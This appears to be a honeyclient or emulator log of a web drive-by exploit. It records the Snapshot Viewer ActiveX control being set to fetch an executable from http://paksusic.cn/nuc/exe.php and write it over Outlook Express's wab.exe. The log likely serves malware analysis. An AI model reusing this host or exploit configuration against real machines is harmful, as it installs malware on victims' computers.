ActiveXObject.SnapshotViewer.PrintSnapshot=<function PrintSnapshot at 0xb7562924>
ActiveXObject.SnapshotViewer.PrintSnapshot=<function PrintSnapshot at 0xb7562994>
ActiveXObject.SnapshotViewer.classid=clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9
ActiveXObject.SnapshotViewer.id=attack
ActiveXObject.SnapshotViewer.SnapshotPath=http://paksusic.cn/nuc/exe.php
ActiveXObject.SnapshotViewer.CompressedPath=C:/Program Files/Outlook Express/wab.exe
ActiveXObject.SnapshotViewer.SnapshotPath=http://paksusic.cn/nuc/exe.php
ActiveXObject.SnapshotViewer.CompressedPath=C:/Program Files/Outlook Express/wab.exe
ActiveXObject.SnapshotViewer.PrintSnapshot=<function PrintSnapshot at 0xb756a7d4>
ActiveXObject.SnapshotViewer.PrintSnapshot=<function PrintSnapshot at 0xb756a844>
ActiveXObject.SnapshotViewer.classid=clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9
ActiveXObject.SnapshotViewer.id=attack
ActiveXObject.SnapshotViewer.SnapshotPath=http://paksusic.cn/nuc/exe.php
ActiveXObject.SnapshotViewer.CompressedPath=C:/Program Files/Outlook Express/wab.exe
ActiveXObject.SnapshotViewer.SnapshotPath=http://paksusic.cn/nuc/exe.php
ActiveXObject.SnapshotViewer.CompressedPath=C:/Program Files/Outlook Express/wab.exe
